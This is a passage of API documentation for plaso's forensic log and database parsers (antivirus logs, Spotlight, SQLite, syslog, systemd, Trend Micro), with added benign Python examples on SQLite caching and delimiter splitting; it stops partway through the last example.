• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – line from a text file.
Returns True if the line is in the expected format, False if not.
Return type bool
plaso.parsers.sophos_av module
Sophos Anti-Virus log (SAV.txt) parser.
References https://community.sophos.com/kb/en-us/110923
class plaso.parsers.sophos_av.SophosAVLogEventData
Bases: plaso.containers.events.EventData
Sophos Anti-Virus log event data.
text: Sophos Anti-Virus log message.
Type str
DATA_TYPE = 'sophos:av:log'
class plaso.parsers.sophos_av.SophosAVLogParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parses Sophos Anti-Virus log (SAV.txt) files.
DATA_FORMAT = 'Sophos Anti-Virus log file (SAV.txt) file'
LINE_STRUCTURES = [('logline', {Group:({{{W:(0123...) W:(0123...)} W:(0123...)} {{W:(0123...) W:(0123...)} W:(0123...)}}) SkipTo:(lineEnd)})]
MAX_LINE_LENGTH = 4096
NAME = 'sophos_av'
ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – identifier of the structure of tokens.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, line)
Verify that this file is a Sophos Anti-Virus log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS.
• line (str) – line from a text file.
Returns True if the line is in the expected format, False if not.
Return type bool
plaso.parsers.spotlight_storedb module
Parser for Apple Spotlight store database files.
class plaso.parsers.spotlight_storedb.SpotlightStoreDatabaseParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parser for Apple Spotlight store database (store.db) files.
DATA_FORMAT = 'Apple Spotlight store database (store.db) file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'spotlight_storedb'
ParseFileObject(parser_mediator, file_object)
Parses an Apple Spotlight store database file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
class plaso.parsers.spotlight_storedb.SpotlightStoreMetadataAttribute
Bases: object
Metadata attribute.
key: key or name of the metadata attribute.
Type str
property_type: metadata attribute property type.
Type int
value: metadata attribute value.
Type object
value_type: metadata attribute value type.
Type int
class plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItem
Bases: object
Metadata item.
attributes: metadata attributes.
Type dict[str, SpotlightStoreMetadataAttribute]
data_size: size of the record data.
Type int
flags: record flags.
Type int
identifier: file (system) entry identifier.
Type int
item_identifier: item identifier.
Type int
last_update_time: last update time.
Type int
parent_identifier: parent file (system) entry identifier.
Type int
class plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemEventData
Bases: plaso.containers.events.EventData
Apple Spotlight store database metadata item event data.
content_type: content type of the corresponding file (system) entry (kMDItemContentType).
Type str
file_name: name of the corresponding file (system) entry (_kMDItemFileName).
Type str
file_system_identifier: file system identifier, for example the catalog node identifier (CNID) on HFS.
Type int
kind: item kind (kMDItemKind).
Type str
parent_file_system_identifier: file system identifier of the parent.
Type int
DATA_TYPE = 'spotlight:metadata_item'
plaso.parsers.sqlite module
SQLite parser.
class plaso.parsers.sqlite.SQLiteCache
Bases: plaso.parsers.plugins.BasePluginCache
Cache for storing results of SQL queries.
CacheQueryResults(sql_results, attribute_name, key_name, column_names)
Build a dictionary object based on a SQL command.
This function will take a SQL command, execute it and for each resulting row it will store a key in a dictionary.
An example:
    sql_results = A SQL result object after executing the SQL command: 'SELECT foo, bla, bar FROM my_table'
    attribute_name = 'all_the_things'
    key_name = 'foo'
    column_names = ['bla', 'bar']
Results from running this against the database:
    'first', 'stuff', 'things'
    'second', 'another stuff', 'another thing'
This will result in a dictionary object being created in the cache, called 'all_the_things' and it will contain the following value:
    all_the_things = {'first': ['stuff', 'things'],
                      'second': ['another_stuff', 'another_thing'],
                      'third': ['single_thing']}
Parameters
• sql_results (sqlite3.Cursor) – result after executing a SQL command on a database.
• attribute_name (str) – attribute name in the cache to store results to. This will be the name of the dictionary attribute.
• key_name (str) – name of the result field that should be used as a key in the resulting dictionary that is created.
• column_names (list[str]) – of column names that are stored as values to the dictionary. If this list has only one value in it the value will be stored directly, otherwise the value will be a list containing the extracted results based on the names provided in this list.
GetRowCache(query)
Retrieves the row cache for a specific query.
The row cache is a set that contains hashes of values in a row. The row cache is used to find duplicate rows when a database and a database with a WAL file is parsed.
Parameters query (str) – query.
Returns hashes of the rows that have been parsed.
Return type set
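The query cache and the row cache described for SQLiteCache above, as an added example that is not plaso's own code: a small stand-in class (QueryResultCache, a constructed name) builds the keyed dictionary from a cursor exactly as the docstring lays out, and a per-query set of row hashes lets a second pass over the same table (as happens when a database and its copy with a WAL are both parsed) skip rows that were already produced. The table, its rows and the helper names are constructed for this example; only the standard library is used.

```python
import hashlib
import sqlite3


class QueryResultCache:
    """Stand-in for the cache behaviour described above (not plaso's class)."""

    def __init__(self):
        self._row_caches = {}

    def CacheQueryResults(self, sql_results, attribute_name, key_name, column_names):
        """Builds a dictionary from a cursor and stores it as an attribute.

        A single name in column_names stores that value directly; several
        names store a list of values in the order the names were given.
        """
        # cursor.description gives the result column names in result order.
        result_columns = [column[0] for column in sql_results.description]
        key_index = result_columns.index(key_name)
        value_indexes = [result_columns.index(name) for name in column_names]

        results = {}
        for row in sql_results:
            if len(value_indexes) == 1:
                results[row[key_index]] = row[value_indexes[0]]
            else:
                results[row[key_index]] = [row[index] for index in value_indexes]

        setattr(self, attribute_name, results)
        return results

    def GetRowCache(self, query):
        """Returns the set of row hashes already seen for this query."""
        return self._row_caches.setdefault(query, set())


def HashRow(row):
    """Hashes every value of a row so identical rows map to one entry."""
    digest = hashlib.sha256()
    for value in row:
        digest.update(repr(value).encode('utf-8'))
    return digest.hexdigest()


def ParseUniqueRows(cache, connection, query):
    """Returns only the rows not yet recorded in the query's row cache."""
    row_cache = cache.GetRowCache(query)
    new_rows = []
    for row in connection.execute(query):
        row_hash = HashRow(row)
        if row_hash in row_cache:
            continue  # already produced by an earlier pass over this query
        row_cache.add(row_hash)
        new_rows.append(row)
    return new_rows


def BuildSampleDatabase():
    """Constructed in-memory table matching the docstring's example."""
    connection = sqlite3.connect(':memory:')
    connection.execute('CREATE TABLE my_table (foo TEXT, bla TEXT, bar TEXT)')
    connection.executemany(
        'INSERT INTO my_table VALUES (?, ?, ?)',
        [('first', 'stuff', 'things'),
         ('second', 'another stuff', 'another thing')])
    connection.commit()
    return connection


def Demo():
    """Fills the cache, then parses the table twice with one row added in between."""
    connection = BuildSampleDatabase()
    cache = QueryResultCache()
    query = 'SELECT foo, bla, bar FROM my_table'
    cache.CacheQueryResults(connection.execute(query), 'all_the_things', 'foo', ['bla', 'bar'])

    first_pass = ParseUniqueRows(cache, connection, query)
    # Simulates the extra row that only the WAL-backed copy would contain.
    connection.execute("INSERT INTO my_table VALUES ('third', 'single', 'thing')")
    second_pass = ParseUniqueRows(cache, connection, query)
    return cache.all_the_things, first_pass, second_pass
```

The hash covers every column value of the row, so two rows that differ only in a column the plugin does not extract still count as different; hashing only the extracted columns would collapse them, which is usually not what an analyst wants when reconciling a database with its WAL.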
class plaso.parsers.sqlite.SQLiteDatabase(filename, temporary_directory=None)
Bases: object
SQLite database.
schema: schema as an SQL query per table name, for example {'Users': 'CREATE TABLE Users ("id" INTEGER PRIMARY KEY, ...)'}.
Type dict[str, str]
Close()
Closes the database connection and cleans up the temporary file.
Open(file_object, wal_file_object=None)
Opens a SQLite database file.
Since pysqlite cannot read directly from a file-like object a temporary copy of the file is made. After creating a copy of the database file this function sets up a connection with the database and determines the names of the tables.
Parameters
• file_object (dfvfs.FileIO) – file-like object.
• wal_file_object (Optional[dfvfs.FileIO]) – file-like object for the Write-Ahead Log (WAL) file.
Raises
• IOError – if the file-like object cannot be read.
• OSError – if the file-like object cannot be read.
• sqlite3.DatabaseError – if the database cannot be parsed.
• ValueError – if the file-like object is missing.
Query(query)
Queries the database.
Parameters query (str) – SQL query.
Returns results.
Return type sqlite3.Cursor
Raises sqlite3.DatabaseError – if querying the database fails.
SCHEMA_QUERY = 'SELECT tbl_name, sql FROM sqlite_master WHERE type = "table" AND tbl_name != "xp_proc" AND tbl_name != "sqlite_sequence"'
property tables: names of all the tables.
Type list[str]
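How the temporary-copy approach in Open works, as an added example rather than plaso's SQLiteDatabase: TemporaryCopyDatabase (a constructed name) copies the file-like object into a private temporary directory, places an optional WAL beside it under the "<database>-wal" name SQLite looks for, and fills the schema from a variant of SCHEMA_QUERY written with single-quoted string literals (SQLite treats a double-quoted "table" as an identifier first and only falls back to a string literal when no such column exists). The sample database with its Users table is constructed for the example.

```python
import io
import os
import shutil
import sqlite3
import tempfile


# Same selection as the page's SCHEMA_QUERY, with single-quoted string
# literals so the comparison never depends on SQLite's double-quote fallback.
SCHEMA_QUERY = (
    "SELECT tbl_name, sql FROM sqlite_master WHERE type = 'table' "
    "AND tbl_name != 'xp_proc' AND tbl_name != 'sqlite_sequence'")


class TemporaryCopyDatabase:
    """Opens a SQLite database from a file-like object via a temporary copy.

    Constructed stand-in for the Open/Query/Close/tables interface above.
    """

    def __init__(self, filename, temporary_directory=None):
        self._connection = None
        self._filename = filename
        self._temporary_directory = temporary_directory
        self._temporary_path = None
        self.schema = {}

    def Open(self, file_object, wal_file_object=None):
        if file_object is None:
            raise ValueError('Missing file-like object.')
        # sqlite3 only opens paths, so the bytes go into a private directory;
        # the copy also keeps the evidence file itself untouched.
        self._temporary_path = tempfile.mkdtemp(dir=self._temporary_directory)
        database_path = os.path.join(self._temporary_path, self._filename)
        with open(database_path, 'wb') as destination:
            shutil.copyfileobj(file_object, destination)
        # SQLite only applies a WAL that sits beside the database as
        # "<database>-wal"; without it, un-checkpointed rows stay invisible.
        if wal_file_object is not None:
            with open('{0:s}-wal'.format(database_path), 'wb') as destination:
                shutil.copyfileobj(wal_file_object, destination)
        self._connection = sqlite3.connect(database_path)
        for table_name, create_statement in self._connection.execute(SCHEMA_QUERY):
            self.schema[table_name] = create_statement

    @property
    def tables(self):
        return list(self.schema.keys())

    def Query(self, query):
        return self._connection.execute(query)

    def Close(self):
        if self._connection:
            self._connection.close()
            self._connection = None
        if self._temporary_path:
            shutil.rmtree(self._temporary_path, ignore_errors=True)
            self._temporary_path = None


def BuildSampleDatabaseBytes():
    """Constructed sample database, returned as an in-memory file-like object.

    AUTOINCREMENT makes SQLite create the sqlite_sequence table, which the
    schema query is expected to leave out.
    """
    directory = tempfile.mkdtemp()
    path = os.path.join(directory, 'sample.db')
    connection = sqlite3.connect(path)
    connection.execute(
        'CREATE TABLE Users (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT)')
    connection.execute("INSERT INTO Users (name) VALUES ('alice')")
    connection.commit()
    connection.close()
    with open(path, 'rb') as source:
        data = source.read()
    shutil.rmtree(directory)
    return io.BytesIO(data)


def Demo():
    """Opens the sample bytes, lists tables, reads rows and cleans up."""
    database = TemporaryCopyDatabase('sample.db')
    database.Open(BuildSampleDatabaseBytes())
    tables = database.tables
    rows = list(database.Query('SELECT id, name FROM Users'))
    database.Close()
    return tables, rows
```

Close removes the whole temporary directory, not just the database copy, so a copied WAL (and the -shm file SQLite creates next to it) do not outlive the parse.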
class plaso.parsers.sqlite.SQLiteParser
Bases: plaso.parsers.interface.FileEntryParser
Parses SQLite database files.
DATA_FORMAT = 'SQLite database file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns a format specification or None if not available.
Return type FormatSpecification
NAME = 'sqlite'
ParseFileEntry(parser_mediator, file_entry)
Parses a SQLite database file entry.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• file_entry (dfvfs.FileEntry) – file entry to be parsed.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.symantec module
This file contains a Symantec parser in plaso.
class plaso.parsers.symantec.SymantecEventData
Bases: plaso.containers.events.EventData
Symantec event data.
access: access.
Type str
action0: action0.
Type str
action1: action1.
Type str
action1_status: action1 status.
Type str
action2: action2.
Type str
action2_status: action2 status.
Type str
address: address.
Type str
backup_id: backup identifier.
Type str
cat: category.
Type str
cleaninfo: clean information.
Type str
clientgroup: client group.
Type str
compressed: compressed.
Type str
computer: computer.
Type str
definfo: definfo.
Type str
defseqnumber: def sequence number.
Type str
deleteinfo: delete information.
Type str
depth: depth.
Type str
description: description.
Type str
domain_guid: domain identifier (GUID).
Type str
domainname: domain name.
Type str
err_code: error code.
Type str
event_data: event data.
Type str
event: event.
Type str
extra: extra.
Type str
file: file.
Type str
flags: flags.
Type str
groupid: group identifier.
Type str
guid: guid.
Type str
license_expiration_dt: license expiration date.
Type str
license_feature_name: license feature name.
Type str
license_feature_ver: license feature ver.
Type str
license_fulfillment_id: license fulfillment identifier.
Type str
license_lifecycle: license lifecycle.
Type str
license_seats_delta: license seats delta.
Type str
license_seats: license seats.
Type str
license_seats_total: license seats total.
Type str
license_serial_num: license serial number.
Type str
license_start_dt: license start date.
Type str
logger: logger.
Type str
login_domain: login domain.
Type str
log_session_guid: log session identifier (GUID).
Type str
macaddr: MAC address.
Type str
new_ext: new ext.
Type str
ntdomain: ntdomain.
Type str
offset: offset.
Type str
parent: parent.
Type str
quarfwd_status: quarfwd status.
Type str
remote_machine_ip: remote machine IP address.
Type str
remote_machine: remote machine.
Type str
scanid: scan identifier.
Type str
snd_status: snd status.
Type str
status: status.
Type str
still_infected: still infected.
Type str
time: time.
Type str
user: user.
Type str
vbin_id: vbin identifier.
Type str
vbin_session_id: vbin session identifier.
Type str
version: version.
Type str
virus_id: virus identifier.
Type str
virus: virus.
Type str
virustype: virustype.
Type str
DATA_TYPE = 'av:symantec:scanlog'
class plaso.parsers.symantec.SymantecParser(encoding=None)
Bases: plaso.parsers.dsv_parser.DSVParser
Parses Symantec AV Corporate Edition and Endpoint Protection log files.
COLUMNS = ['time', 'event', 'cat', 'logger', 'computer', 'user', 'virus', 'file', 'action1', 'action2', 'action0', 'virustype', 'flags', 'description', 'scanid', 'new_ext', 'groupid', 'event_data', 'vbin_id', 'virus_id', 'quarfwd_status', 'access', 'snd_status', 'compressed', 'depth', 'still_infected', 'definfo', 'defseqnumber', 'cleaninfo', 'deleteinfo', 'backup_id', 'parent', 'guid', 'clientgroup', 'address', 'domainname', 'ntdomain', 'macaddr', 'version:', 'remote_machine', 'remote_machine_ip', 'action1_status', 'action2_status', 'license_feature_name', 'license_feature_ver', 'license_serial_num', 'license_fulfillment_id', 'license_start_dt', 'license_expiration_dt', 'license_lifecycle', 'license_seats_total', 'license_seats', 'err_code', 'license_seats_delta', 'status', 'domain_guid', 'log_session_guid', 'vbin_session_id', 'login_domain', 'extra']
DATA_FORMAT = 'AV Corporate Edition and Endpoint Protection log file'
NAME = 'symantec_scanlog'
ParseRow(parser_mediator, row_offset, row)
Parses a line of the log file and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row_offset (int) – line number of the row.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
VerifyRow(parser_mediator, row)
Verifies if a line of the file is in the expected format.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
Returns True if this is the correct parser, False otherwise.
Return type bool
plaso.parsers.syslog module
Parser for syslog formatted log files.
Also see: https://www.rsyslog.com/doc/v8-stable/configuration/templates.html
class plaso.parsers.syslog.SyslogCommentEventData
Bases: plaso.containers.events.EventData
Syslog comment event data.
body: message body.
Type str
DATA_TYPE = 'syslog:comment'
class plaso.parsers.syslog.SyslogLineEventData(data_type='syslog:line')
Bases: plaso.containers.events.EventData
Syslog line event data.
body: message body.
Type str
hostname: hostname of the reporter.
Type str
pid: process identifier of the reporter.
Type str
reporter: reporter.
Type str
severity: severity.
Type str
DATA_TYPE = 'syslog:line'
class plaso.parsers.syslog.SyslogParser
Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser
Parses syslog formatted log files.
DATA_FORMAT = 'System log (syslog) file'
EnablePlugins(plugin_includes)
Enables parser plugins.
Parameters plugin_includes (list[str]) – names of the plugins to enable, where None or an empty list represents all plugins. Note that the default plugin is handled separately.
LINE_STRUCTURES = [('chromeos_syslog_line', {{{{{{{Combine:({{{{{{{{{{{{{{{W:(0123...) "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} - | +} W:(0123...)} [{":" W:(0123...)}]}) EMERG | ALERT | CRIT | ERR | WARNING | NOTICE | INFO | DEBUG} W:(0123...)} [Suppress:(":")]} [{{Suppress:("[") W:(0123...)} Suppress:("]")}]} [Suppress:(":")]} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('kernel_syslog_line', {{{{{{{{{{{W:(ABCD..., abcd...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]} "kernel"} Suppress:(":")} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('rsyslog_line', {{{{{{{Combine:({{{{{{{{{{{{{{{W:(0123...) "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} - | +} W:(0123...)} [{":" W:(0123...)}]}) W:(0123...)} W:(0123...)} [{{Suppress:("[") W:(0123...)} Suppress:("]")}]} [{{Suppress:("<") W:(0123...)} Suppress:(">")}]} [Suppress:(":")]} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('rsyslog_traditional_line', {{{{{{{{{{{{{{W:(ABCD..., abcd...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]} W:(0123...)} W:(0123...)} [{{Suppress:("[") W:(0123...)} Suppress:("]")}]} [{{Suppress:("<") W:(0123...)} Suppress:(">")}]} [Suppress:(":")]} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('syslog_comment', {{{{{{{{{{{{W:(ABCD..., abcd...) 
W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]} Suppress:(":")} Suppress:("---")} SkipTo:(" ---")} Suppress:("---")} LineEnd})]
NAME = 'syslog'
ParseRecord(parser_mediator, key, structure)
Parses a matching entry.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – elements parsed from the file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, lines)
Verifies that this is a syslog-formatted file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• lines (str) – one or more lines from the text file.
Returns True if this is the correct parser, False otherwise.
Return type bool
plaso.parsers.systemd_journal module
Parser for Systemd journal files.
class plaso.parsers.systemd_journal.SystemdJournalEventData
Bases: plaso.containers.events.EventData
Systemd journal event data.
body: message body.
Type str
hostname: hostname.
Type str
pid: process identifier (PID).
Type int
reporter: reporter.
Type str
DATA_TYPE = 'systemd:journal'
class plaso.parsers.systemd_journal.SystemdJournalParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parses Systemd Journal files.
DATA_FORMAT = 'Systemd journal file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'systemd_journal'
ParseFileObject(parser_mediator, file_object)
Parses a Systemd journal file-like object.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the header cannot be parsed.
plaso.parsers.text_parser module
This file contains a class to provide a parsing framework to plaso.
This class contains a base framework class for parsing file-like objects, and also some implementations that extend it to provide a more comprehensive parser.
plaso.parsers.text_parser.ConvertTokenToInteger(string, location, tokens)
Pyparsing parse action callback to convert a token into an integer value.
Parameters
• string (str) – original string.
• location (int) – location in the string where the token was found.
• tokens (list[str]) – tokens.
Returns integer value or None.
Return type int
class plaso.parsers.text_parser.EncodedTextReader(encoding, buffer_size=2048)
Bases: object
Encoded text reader.
ReadLine(file_object)
Reads a line.
Parameters file_object (dfvfs.FileIO) – file-like object.
Returns line read from the lines buffer.
Return type str
ReadLines(file_object)
Reads lines into the lines buffer.
Parameters file_object (dfvfs.FileIO) – file-like object.
Reset()
Resets the encoded text reader.
SkipAhead(file_object, number_of_characters)
Skips ahead a number of characters.
Parameters
• file_object (dfvfs.FileIO) – file-like object.
• number_of_characters (int) – number of characters.
plaso.parsers.text_parser.PyParseIntCast(string, location, tokens)
Return an integer from a string.
This is a pyparsing callback method that converts the matched string into an integer.
The method modifies the content of the tokens list and converts them all to an integer value.
Parameters
• string (str) – original string.
• location (int) – location in the string where the match was made.
• tokens (list[str]) – extracted tokens, where the string to be converted is stored.
class plaso.parsers.text_parser.PyparsingConstants
Bases: object
Constants for pyparsing-based parsers.
COMMENT_LINE_HASH = {"#" SkipTo:(LineEnd)}
DATE = Group:({{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)})
DATE_ELEMENTS = {{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)}
DATE_TIME = Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}})
DATE_TIME_MSEC = Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}})
FOUR_DIGITS = W:(0123...)
HYPHEN = Suppress:("-")
INTEGER = W:(0123...)
IPV4_ADDRESS = IPv4 address
IPV6_ADDRESS = IPv6 address
IP_ADDRESS = {IPv4 address | IPv6 address}
MONTH = W:(ABCD..., abcd...)
ONE_OR_TWO_DIGITS = W:(0123...)
PID = W:(0123...)
THREE_DIGITS = W:(0123...)
THREE_LETTERS = W:(ABCD...)
TIME = Group:({{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)})
TIME_ELEMENTS = {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}
TIME_MSEC = {{Group:({{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}) Suppress:(".")} W:(0123...)}
TIME_MSEC_ELEMENTS = {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}
TWO_DIGITS = W:(0123...)
class plaso.parsers.text_parser.PyparsingMultiLineTextParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Multi line text parser interface based on pyparsing.
BUFFER_SIZE = 2048
ParseFileObject(parser_mediator, file_object)
Parses a text file-like object using a pyparsing definition.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
abstract ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
This function takes as an input a parsed pyparsing structure and produces an EventObject if possible from that structure.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – tokens from a parsed log line.
Returns event or None.
Return type EventObject
abstract VerifyStructure(parser_mediator, lines)
Verify the structure of the file and return boolean based on that check.
This function should read enough text from the text file to confirm that the file is the correct one for this particular parser.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• lines (str) – one or more lines from the text file.
Returns True if this is the correct parser, False otherwise.
Return type bool
class plaso.parsers.text_parser.PyparsingSingleLineTextParser
Bases: plaso.parsers.interface.FileObjectParser
Single line text parser interface based on pyparsing.
LINE_STRUCTURES = []
MAXIMUM_CONSECUTIVE_LINE_FAILURES = 20
MAX_LINE_LENGTH = 400
ParseFileObject(parser_mediator, file_object)
Parses a text file-like object using a pyparsing definition.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
abstract ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
This function takes as an input a parsed pyparsing structure and produces an EventObject if possible from that structure.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – tokens from a parsed log line.
abstract VerifyStructure(parser_mediator, line)
Verify the structure of the file and return boolean based on that check.
This function should read enough text from the text file to confirm that the file is the correct one for this particular parser.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – single line from the text file.
Returns True if this is the correct parser, False otherwise.
Return type bool
plaso.parsers.trendmicroav module
Parser for Trend Micro Antivirus logs.
Trend Micro uses two log files to track the scans (both manual/scheduled and real-time) and the web reputation (network scan/filtering).
Currently only the first log is supported.
class plaso.parsers.trendmicroav.OfficeScanVirusDetectionParser(encoding=None)
Bases: plaso.parsers.trendmicroav.TrendMicroBaseParser
Parses the Trend Micro Office Scan Virus Detection Log.
COLUMNS = ['date', 'time', 'threat', 'action', 'scan_type', 'unused1', 'path', 'filename', 'unused2', 'timestamp', 'unused3', 'unused4']
DATA_FORMAT = 'Trend Micro Office Scan Virus Detection log file'
MIN_COLUMNS = 8
NAME = 'trendmicro_vd'
ParseRow(parser_mediator, row_offset, row)
Parses a line of the log file and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row_offset (int) – line number of the row.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
VerifyRow(parser_mediator, row)
Verifies if a line of the file is in the expected format.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
Returns True if this is the correct parser, False otherwise.
Return type bool
class plaso.parsers.trendmicroav.OfficeScanWebReputationParser(encoding=None)
Bases: plaso.parsers.trendmicroav.TrendMicroBaseParser
Parses the Trend Micro Office Scan Web Reputation detection log.
COLUMNS = ('date', 'time', 'block_mode', 'url', 'group_code', 'group_name', 'credibility_rating', 'policy_identifier', 'application_name', 'credibility_score', 'ip', 'threshold', 'timestamp', 'unused')
DATA_FORMAT = 'Trend Micro Office Web Reputation log file'
MIN_COLUMNS = 12
NAME = 'trendmicro_url'
ParseRow(parser_mediator, row_offset, row)
Parses a line of the log file and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row_offset (int) – line number of the row.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
VerifyRow(parser_mediator, row)
Verifies if a line of the file is in the expected format.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
Returns True if this is the correct parser, False otherwise.
Return type bool
class plaso.parsers.trendmicroav.TrendMicroAVEventData
Bases: plaso.containers.events.EventData
Trend Micro AV Log event data.
action: action.
Type str
filename: filename.
Type str
path: path.
Type str
scan_type: scan_type.
Type str
threat: threat.
Type str
DATA_TYPE = 'av:trendmicro:scan'
class plaso.parsers.trendmicroav.TrendMicroBaseParser(encoding=None)
Bases: plaso.parsers.dsv_parser.DSVParser
Common code for parsing Trend Micro log files.
The file format is reminiscent of CSV, but is not quite the same; the delimiter is a three-character sequence and there is no provision for quoting or escaping.
COLUMNS = ()
DELIMITER = '<;>'
MIN_COLUMNS = None
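What a three-character delimiter with no quoting or escaping means in practice, as an added example that is not plaso's DSVParser: the line is split on the '<;>' sequence with str.split, since csv.reader only accepts one-character delimiters, and a MIN_COLUMNS-style bound rejects rows whose field count is off. The column list is the Office Scan virus detection layout given on this page; the sample lines, the VerifyRow rule (rejecting rows with more fields than named columns) and the function names are constructed for the example.

```python
# Column layout of the Office Scan virus detection log, as listed on the page.
COLUMNS = ['date', 'time', 'threat', 'action', 'scan_type', 'unused1', 'path',
           'filename', 'unused2', 'timestamp', 'unused3', 'unused4']
DELIMITER = '<;>'
MIN_COLUMNS = 8


def SplitRow(line, delimiter=DELIMITER):
    """Splits one log line on the three-character delimiter.

    csv.reader only accepts a one-character delimiter, so str.split is used.
    Because the format has neither quoting nor escaping, a delimiter sequence
    inside a field value is indistinguishable from a field boundary.
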